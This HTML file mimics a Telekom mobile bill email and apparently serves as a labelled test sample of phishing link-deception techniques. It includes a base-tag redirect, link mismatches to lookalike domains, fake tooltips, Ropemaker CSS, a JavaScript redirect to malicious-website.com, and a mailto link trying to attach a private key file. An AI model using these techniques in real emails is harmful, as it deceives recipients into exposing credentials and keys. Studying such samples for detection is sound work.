<!DOCTYPE html>
<html>
   <head>
      <title>Ihre Telekom Mobilfunk RechnungOnline Juni 2024</title>
               
      <!-- for Ropemaker-->
       <link rel="stylesheet" href="https://shirley1997.github.io/ropemaker-test-links.css">

      <!-- original stylesheet-->
      <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">   

   
      

      <!-- for Fake Tooltip using Bootstrap -->
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
      

     


      
      
      <style>


            


         /* CSS style for Fake Tooltip using Bootstrap  */
         .boottooltip {
         font-size: 12px; /* Adjust the font size */
            
         }

         .boottooltip-inner {
         background-color: #c55e5e; /* Custom background color */
         color: #ffffff; /* Text color */
            
         }


        .content {
          text-align: center;
        }
      
         /* For Fake Tooltip using HTML and CSS  */

        .tooltip-container {
          position: relative;
          display: inline-block;
          cursor: pointer;
        }   
      
        .tooltip-container .tooltip {
          visibility: hidden;
          width: max-content;
          font-size: 10px;
          background-color: rgb(113, 151, 223);
          color: rgb(255, 255, 255);
          text-align: center;
          border-radius: 5px;
          padding: 6px;
          position: absolute;
          z-index: 1;
          bottom: calc(100%);  /* Position the tooltip above the container */
          left: 50%;
          transform: translateX(-50%);
           /* Use negative half of the width to center */ 
          opacity: 0;
          transition: opacity 0.3s;
          
        } 
      
        .tooltip-container:hover .tooltip {
          visibility: visible;
          opacity: 1;
          
        }
      
        .tooltip-container .tooltip a {
          color: rgb(255, 255, 255);
          text-decoration: none;
        }
      

        /* For Fake Fade In Tooltip using HTML and CSS */

        .tooltip-container .tooltipanime {  
          visibility: hidden;
          width: max-content;
          background-color: rgb(167, 159, 172);
          color: #ffffff;
          text-align: center;
          border-radius: 6px;
          padding: 5px;
          position: absolute;
          z-index: 1;
          bottom: 100%;
          left: 150%;
          margin-left: -210px;
          font-size: 10px;
          
          /* Fake Fade In Tooltip using HTML and CSS - takes 1 second to go from 0% to 100% opac: */
          opacity: 0;
          transition: opacity 1s;
        }
      
        .tooltip-container:hover .tooltipanime {
          
        visibility: visible;
        opacity: 1;
        }
      
      
      
        /* create the trainagle under tooltips */
        .tooltip-container .tooltip::after {
                  content: '';
                  position: absolute;
                  top: 100%;
                  left: 50%;
                  margin-left: -5px;
                  border-width: 5px;
                  border-style: solid;
                  border-color: #000000 transparent transparent transparent;
              }
      
      

            /* For Fake Tooltip using CSS Hover Effect*/
            .tooltip-link {
                position: relative;
                text-decoration: none;
                color: #000000; /* Adjust link color */
            }
            .tooltip-link:hover:after {
                content: "Redirect to: https://www.telekom.de/hilfe";
                position: absolute;
                width: max-content;
                font-size: 10px;
                background-color: #af6767;
                color: #fff;
                border-radius: 6px;
                padding: 6px;
                z-index: 1;
                bottom: 300%;
                left: 50%;
                transform: translateX(-50%);
                opacity: 0;
                visibility: hidden;
                transition: opacity 0.3s;
            }
            
            .tooltip-link:hover:after {
                opacity: 1;
                visibility: visible;
            }
            

             /* For Fake Popup Tooltip using JavaScript */
                .popup-container {
                    color: #00A4D6;
                    position: relative;
                    display: inline-block;
                    cursor: pointer;
                    text-decoration: underline;
                    }
                    
                    /* The actual popup (appears on top) */
                    .popup-container .popuptooltip {
                    visibility: hidden;
                    font-size: 10px;
                    width: 250px;
                    background-color: #2d47da;
                    color: #fff;
                    text-align: center;
                    border-radius: 6px;
                    padding: 8px 0;
                    position: absolute;
                    z-index: 1;
                    bottom: 125%;
                    left: 5%;
                    margin-left: -80px;
                    transition: opacity 0.3s;
                    }
                    
                    /* Popup arrow */
                    .popup-container .popuptooltip::after {
                    content: "";
                    position: absolute;
                    top: 100%;
                    left: 50%;
                    margin-left: -5px;
                    border-width: 5px;
                    border-style: solid;
                    border-color: #555 transparent transparent transparent;
                    }
                    
                    /* Toggle this class when clicking on the popup container (hide and show the popup) */
                    .popup-container .show {
                    visibility: visible;
                    opacity: 1;
                    -webkit-animation: fadeIn 0.5s;
                    animation: fadeIn 0.5s
                    }
                    

                    /* For Fake Fade In Tooltip using HTML and CSS */
                    @-webkit-keyframes fadeIn {
                    from {opacity: 0;}
                    to {opacity: 1;}
                    }
                    
                    @keyframes fadeIn {
                    from {opacity: 0;}
                    to {opacity:1 ;}
                    }

      </style>



   </head>
   <body>


      <table border=0 cellspacing=0 cellpadding=0 width="100%" class="moz-header-part1 moz-main-header">


      </table>
      <table border=0 cellspacing=0 cellpadding=0 width="100%" class="moz-header-part2 moz-main-header">

      </table>


      <br>
      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
      <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
            <meta http-equiv="Content-Type" content="text/html; ">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <title>TELEKOM - ERLEBEN, WAS VERBINDET.</title>
            <meta name="format-detection" content="telephone=no">
         </head>
         <body bgcolor="#676767">


            <div class="moz-text-html" lang="x-western">
               <img src="https://pix.telekom.de/196380495960676/wt?p=328,newsletter.telekom.de.emo.em_reomf-20240101-d,0,0,0,0,0,0,0,0&amp;cg1=newsletter.telekom.de&amp;cg2=emo&amp;cg9=20240101&amp;uc22=m1" alt="" width="1" height="1" border="0">
               <center>
                  <span></span>
                  <table width="490" cellspacing="0" border="0" bgcolor="#ffffff">
                     <tbody>
                        <tr>
                           <td bgcolor="#E20074">
                              <div><a href="https://www.telekom.de/start?wt_mc=er_sososoxx_in2s-reomf-rechnungonline-logo&amp;wt_cc4=m1" target="_blank"><img src="https://www.rechnung-online.telekom.de/mf/static/telekom-bar-header-490x83.png" alt="TELEKOM - ERLEBEN, WAS VERBINDET." width="490" height="83"></a></div>
                           </td>
                        </tr>
                        <tr>
                           <td>



                              <div style="margin: 25px 30px 25px 25px; color: #444748; background-color: #ffffff; line-height: 1.4; font-family: Arial; font-size: 17px;">Guten Tag, <br><br>für die Adresse <b>Kaiserstraße 12</b>, Kundenkonto <b>0012345678</b> erhalten Sie mit dieser E-Mail Ihre Mobilfunk-Rechnung mit der Rechnungsnummer 123456789098776.<br><br>Freundliche Grüße<br>Ihre Telekom</div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="line-height: 1.4; font-family: Arial; color: #417AAA; font-size: 20px; font-weight: bold;">
                                 <table style="margin: 0px 30px 0px 25px; background-color: #417AAA;">
                                    <tbody>
                                       <tr>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA; width: 25px; height: 22px;">&nbsp;</td>
                                          <td colspan="2" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA; width: 390px; height: 22px;">&nbsp;</td>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA; width: 25px; height: 22px;">&nbsp;</td>
                                       </tr>
                                       <tr>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                          <td colspan="2" style="font-family: Arial; text-align: left; color: #FFFFFF; font-size: 20px; font-weight: bold; background-color: #417AAA;">FÜR JUNI 2024</td>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                       </tr>
                                       <tr>
                                          <td colspan="4" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 1px; font-weight: bold; background-color: #417AAA; height: 20px;">&nbsp;</td>
                                       </tr>
                                       <tr>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                          <td style="font-family: Arial; text-align: left; color: #FFFFFF; font-size: 20px; font-weight: normal; background-color: #417AAA;">ZU ZAHLENDER BETRAG</td>
                                          <td style="font-family: Arial; text-align: right; color: #FFFFFF; font-size: 20px; font-weight: bold; background-color: #417AAA;">1674.95€</td>
                                          <td style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                       </tr>
                                       <tr>
                                          <td colspan="4" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA; height: 22px;">&nbsp;</td>
                                       </tr>

                                       <base href="https://telekome.de" target="_blank" />
                                       <tr>
                                          <td colspan="1" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                          <td colspan="2" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 20px; font-weight: bold; background-color: #417AAA;">
                                            <a href="telekom.de/rechnungonline" target="_blank" title="redirect to https://www.telekom.de/rechnungonline">
                                                
                                                <button style="width: 200px; height: 50px; background-color: #ffffff; font-weight: bold; font-size: 10px;" >
                                                   RechnungOnline ansehen (HTML Base-Tag)</button>

                                            </a>
                                            
                                        </td>

                                          <td colspan="1" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA;">&nbsp;</td>
                                       </tr>
                                       
                                       <tr>
                                          <td colspan="4" style="font-family: Arial; text-align: left; color: #417AAA; font-size: 2px; font-weight: bold; background-color: #417AAA; height: 25px;">&nbsp;</td>
                                       </tr>


                                    </tbody>
                                 </table>
                              </div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="margin: 25px 30px 25px 25px; color: #444748; background-color: #ffffff; line-height: 1.4; font-family: Arial; font-size: 17px;">Der zu zahlende Betrag von <span style="font-weight: bold;">1674,95&nbsp;€</span> wird von dem uns genannten Konto zum <span style="font-weight: bold;">22.07.2024</span> abgebucht.</div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="margin: 25px 30px 25px 25px; color: #444748; background-color: #ffffff; line-height: 1.4; font-family: Arial; font-size: 17px;">Ihr Rechnungsarchiv inklusive Gutschriften und Einzelverbindungen finden Sie im: <a href="https://www.telekomm.de/kundencenter" target="_blank" style="color: #00A4D6; text-decoration: underline;">https://www.telekom.de/kundencenter</a>. <b>(Link Mismatch)</b></div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="margin: 25px 30px 25px 25px; color: #444748; background-color: #ffffff; line-height: 1.4; font-family: Arial; font-size: 17px;">
                                Sie möchten wissen, ob Beträge offen sind?
                                <br>Ihr <form action="http://telekom1.de/kundencenter" style="display: inline;">
                                    <button type="submit" style="border: none; background-color: transparent; color: #00A4D6; text-decoration: underline; cursor: pointer; padding: 0; font-family: inherit; font-size: 17px; " >
                                        Kontoauszug
                                    </button>
                                </form> 
                                <b>(HTML Form-Tag)</b> zeigt Ihnen die Kontobewegungen der letzten 12 Monate.
                                
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="margin: 25px 30px 25px 25px; color: #444748; background-color: #ffffff; line-height: 1.4; font-family: Arial; font-size: 17px;"></div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="margin: 25px 30px 25px 25px; background-color: #ffffff; line-height: 1.4; font-family: Arial; color: #E20074; font-size: 20px; font-weight: bold;">
                                 WEITERE SERVICES FÜR SIE<br><br>
                                 <table width="440">
                                    <tbody>
                                       <tr>
                                        <!-- Fake Tooltip using HTML and CSS  -->
                                          <td style="width: 33%; text-align: center;">
                                            <div class="tooltip-container">
                                                <a href="https://www.telekomm.de/kundenvertrag" target="_blank">
                                                    <img src="https://www.rechnung-online.telekom.de/mf/static/kundencenter_xhdpi.png" alt="Kundencenter" width="96" height="96">
                                                </a>
                                                <div class="tooltip">
                                                    <a href="https://www.telekomm.de/kundenvertrag" target="_blank">Redirect to: https://www.telekom.de/kundenvertrag </a>
                                                 </div>
                                        </div>
                                        </td>

                                        <!-- Fake Fade In Tooltip using HTML and CSS -->
                                          <td style="width: 33%; text-align: center;">
                                            <div class="tooltip-container">
                                            <a href="https://www.telekomm.de/login" target="_blank" >
                                                <img src="https://www.rechnung-online.telekom.de/mf/static/telekom-hilft-sm_graphical_256.png" alt="Community" width="96" height="96">
                                            </a>
                                            <div class="tooltipanime">
                                                <a href="https://www.telekomm.de/login" target="_blank">Redirect to: https://www.telekom.de/community </a>
                                             </div>
                                        </div>
                                        </td>

                                        <!-- Fake Tooltip using CSS Hover Effect -->
                                          <td style="width: 33%; text-align: center;">
                                            <div class="content">
                                                <a href="https://www.telekome.de/hilfe" target="_blank"  class="tooltip-link">
                                                    <img src="https://www.rechnung-online.telekom.de/mf/static/bill_graphical_256.png" alt="Hilfe zur Rechnung" width="96" height="96">
                                                </a>
                                            </div>
                                        </td>
                                       </tr>
                                       <tr>
                                          <td style="width: 33%; text-align: center;"><span style="font-family: Arial; color: #E20074; font-size: 14px; font-weight: bold;">Ihre Verträge online<br>im Kundencenter <br><font color="black">(Fake Tooltip using HTML and CSS)</font></span></td>
                                          <td style="width: 33%; text-align: center;"><span style="font-family: Arial; color: #E20074; font-size: 14px; font-weight: bold;">Telekom hilft<br>Community <br><font color="black">(Fake Fade In Tooltip using HTML and CSS)</font></span></td>
                                          <td style="width: 33%; text-align: center;"><span style="font-family: Arial; color: #E20074; font-size: 14px; font-weight: bold;">Hilfe zur<br>Rechnung <br><font color="black">(Fake Tooltip using CSS Hover Effect)</font></span></td>
                                       </tr>
                                    </tbody>
                                 </table>
                              </div>
                           </td>
                        </tr>
                        <tr>
                           <td>
                              <div style="line-height: 1.4; font-family: Arial; color: #444748; font-size: 17px; font-weight: normal;">
                                 <br>
                                 <table style=" margin: 0px 30px 0px 25px; background-color: #ffffff; text-align: left;">
                                    <tbody>
                                       <tr>
                                          <td style="width: 446px;">
                                             <div style="width: 446px; margin-top: 15px; margin-bottom: 15px;">
                                                <table width="446">
                                                   <tbody>
                                                      <tr>
                                                         <td></td>
                                                      </tr>
                                                   </tbody>
                                                </table>
                                             </div>
                                          </td>
                                       </tr>
                                    </tbody>
                                 </table>
                              </div>
                           </td>
                        </tr>
                        <tr>

                            
                           <td>

                              <!-- Fake Popup Tooltip using JavaSrcipt -->
                              <div style="margin: 25px 30px 25px 25px; background-color: #ffffff; line-height: 1.4; font-family: Arial; color: #737577; font-size: 12px;">
                                Diese E-Mail wurde für die Adresse Kaiserstr. 12; Kundenkonto: 0012345678 erstellt. Weitere Informationen zu den Sicherheitsmerkmalen von RechnungOnline finden Sie unter 
                                <div class="popup-container" onclick="PopUpFunction()">Sicherheitshinweise 
                                    <span class="popuptooltip" id="Poptooltip">Redirect to: https://www.telekome.de/sicherheit</span>
                                </div>
                                <b>(Fake Popup Tooltip using JavaSrcipt)</b>
                                <br><br>


                                <!-- Ropemaker -->
                                Diese E-Mail wird versendet aufgrund der Einwilligung, über Produkte und Dienstleistungen der Telekom informiert zu werden. Über den Link 
                                 <span id="link1" ><a href="http://telekom.de">Abmeldung</a></span>
                                 <span id="link2" ><a href="http://telekome.de">Abmeldung</a></span> 
                                 <b>(Ropemaker)</b> kann die Einwilligung jederzeit im Kundencenter widerrufen werden.  
                              


                           <br><br>
                           <!-- Fake Tooltip using Bootstrap -->

                           Die Prämie für die Empfehlung richtet sich nach dem tatsächlich bestellten Produkt im Zeitpunkt des Vertragsabschlusses des Kunden. Mehr Information bitte klicken Sie
                           <a href="https://telekome.de/information" data-toggle="tooltip" data-html="true" data-placement="top" title="https://www.telekom.de/information" class="boottooltip-inner">here</a>.<b>(Fake Tooltip using Bootstrap)</b>
                          
                              
                            <br><br>

                           <!-- Fake Tooltip using title-attribute (on Text) -->
                            
                            Es erwarten Sie Deals rund um die UEFA EURO 2024™ sowie weitere exklusive Geschenke und besondere Vorteile, die <a href="https://www.telekom1.de/information" title="Hier erfahren Sie mehr über die Vorteile" style="text-decoration: underline">erfreuen</a>! <b>(Fake Tooltip using title-attribute (on text))</b>   

                              <br><br>

                           <!-- Fake Tooltip using title-attribute (on Button) -->

                              <a href="https://malicious-website.com/verify">
                                 <button title="Hier erfahren Sie mehr über die Vorteile">Mehr Information</button>
                             </a>
                               <b>(Fake Tooltip using title-attribute (on Button))</b>

                               <br><br>
                              
                               <table width="200">
                                 <tbody>
                                    <tr>

                              <!-- Fake Tooltip using title-attribute (on Image) -->
                                     <td style="width: 33%; text-align: center;">
                                       <div class="tooltip-container">
                                           <a href="https://www.telekomm.de/kundenvertrag" target="_blank" title="Redirect to: https://www.telekom.de/kundenvertrag">
                                               <img src="https://www.rechnung-online.telekom.de/mf/static/kundencenter_xhdpi.png" alt="Kundencenter" width="50" height="50">
                                           </a>
                                       </div>
                                   </td>
                                    </tr>
                                    <tr>
                                       <td style="width: 33%; text-align: center;"><span style="font-family: Arial; color: #7495f0; font-size: 10px; font-weight: bold;">Ihre Verträge online<br>im Kundencenter <br><font color="black">(Fake Tooltip using title-attribute (on image)</font></span></td>
  
                                    </tr>
                                 </tbody>
                              </table>
                              

                              <!-- Mailto-Scheme -->
                                Eine direkte Antwort auf diese E-Mail ist nicht möglich. Wenn Sie uns per E-Mail erreichen wollen, nutzen Sie bitte unseren 
                                <a href="mailto:xueting.huang404@gmail.com?subject=contact%20formular&amp&body=Hello,%20I%20have%20questions%20about%20my%20phone%20bill,%20can%20you%20contact%20me%20ASAP?&attach=C:\path\to\private.key" style="color: #00A4D6; text-decoration: underline;">Kontakt per E-Mail</a>.<b>(Mailto-Scheme)</b></div>
                           </td>
                        </tr>
                        <tr>
                           <td bgcolor="#262626">
                              <div style="height: 15px;">&nbsp;

                              </div>

                              <table width="100%">
                                 <tbody>
                                    <tr>
                                       <td align="left"><img src="https://www.rechnung-online.telekom.de/mf/static/spacer.gif" alt="" width="25" height="1"><img src="https://www.rechnung-online.telekom.de/mf/static/T_Logo_K-02.gif" alt="TELEKOM - ERLEBEN, WAS VERBINDET." width="71" height="35"></td>
                                       <td><a style="font-family: Arial; color: #ffffff; font-size: 15px; text-decoration: none;">AGB</a><img src="https://www.rechnung-online.telekom.de/mf/static/spacer.gif" alt="" width="18" height="18"><a style="font-family: Arial; color: #ffffff; font-size: 15px; text-decoration: none;">Impressum</a><img src="https://www.rechnung-online.telekom.de/mf/static/spacer.gif" alt="" width="18" height="18"><a style="font-family: Arial; color: #ffffff; font-size: 15px; text-decoration: none;">Pflichtangaben</a></td>
                                    </tr>
                                    <tr>
                                       <td colspan="2" align="center"><span style="font-family: Arial; color: #ffffff; font-size: 15px;">©<img src="https://www.rechnung-online.telekom.de/mf/static/spacer.gif" alt="" width="1" height="18"> Telekom Deutschland GmbH</span></td>
                                    </tr>
                                 </tbody>
                              </table>
                              <div style="height: 15px;">&nbsp;</div>
                           </td>
                        </tr>
                     </tbody>
                  </table>
               </center>
            </div>
         </body>
      </html>

      <script>

        //for "Fake Popup Tooltip using JavaScript" 
        // When the user clicks on <div>, open the popup
    
        function PopUpFunction() {
        var popup = document.getElementById("Poptooltip");
        popup.classList.toggle("show");
        } 
    
        
        /* let tooltip be clickable and lead to phishing website */
        document.getElementById("Poptooltip").addEventListener("click", function() {
            window.location.href = "https://malicious-website.com/verify";
        });
    


        //for "Fake Tooltip using Bootstrap"
        $(document).ready(function(){
         $('[data-toggle="tooltip"]').tooltip({
            offset: '0, 10' // Adjust the offset here: x, y
        });
    });


</script>


   </body>
</html>



